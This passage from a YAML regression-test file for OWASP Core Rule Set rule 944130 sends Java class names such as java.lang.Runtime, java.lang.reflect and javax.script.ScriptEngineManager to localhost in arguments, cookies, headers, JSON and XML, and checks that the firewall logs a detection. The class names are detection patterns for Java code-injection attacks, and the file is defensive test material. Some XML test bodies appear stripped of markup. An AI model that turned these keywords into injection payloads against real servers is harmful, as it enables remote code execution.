80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-338 + desc: "Nested XML element value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-339 + desc: "Content-Type text/plain includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-340 + desc: "Content-Type application/json arg value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.reflect\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-341 + desc: "Content-Type application/json arg name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.reflect\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-342 + desc: "Argument test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-343 + desc: "Argument name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-344 + desc: "Cookie test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-345 + desc: "Cookie name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Runtime=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-346 + desc: "Request header test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-347 + desc: "XML attribute value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-348 + desc: "XML element value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-349 + desc: "Nested XML element value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-350 + desc: "Content-Type text/plain includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-351 + desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Runtime\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-352 + desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Runtime\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-353 + desc: "Argument test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-354 + desc: "Argument name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-355 + desc: "Cookie test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.String + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-356 + desc: "Cookie name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.String=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-357 + desc: "Request header test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.String + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-358 + desc: "XML attribute value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-359 + desc: "XML element value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-360 + desc: "Nested XML element value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-361 + desc: "Content-Type text/plain includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-362 + desc: "Content-Type application/json arg value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.String\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-363 + desc: "Content-Type application/json arg name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.String\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-364 + desc: "Argument test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-365 + desc: "Argument name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-366 + desc: "Cookie test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.StringBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-367 + desc: "Cookie name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.StringBuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-368 + desc: "Request header test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.StringBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-369 + desc: "XML attribute value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-370 + desc: "XML element value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-371 + desc: "Nested XML element value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-372 + desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-373 + desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.StringBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-374 + desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.StringBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-375 + desc: "Argument test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-376 + desc: "Argument name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-377 + desc: "Cookie test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.System + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-378 + desc: "Cookie name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.System=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-379 + desc: "Request header test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.System + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-380 + desc: "XML attribute value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-381 + desc: "XML element value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-382 + desc: "Nested XML element value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-383 + desc: "Content-Type text/plain includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-384 + desc: "Content-Type application/json arg value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.System\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-385 + desc: "Content-Type application/json arg name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.System\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-386 + desc: "Argument test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-387 + desc: "Argument name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-388 + desc: "Cookie test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=javax.script.ScriptEngineManager + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-389 + desc: "Cookie name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: javax.script.ScriptEngineManager=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-390 + desc: "Request header test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: javax.script.ScriptEngineManager + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-391 + desc: "XML attribute value includes keyword 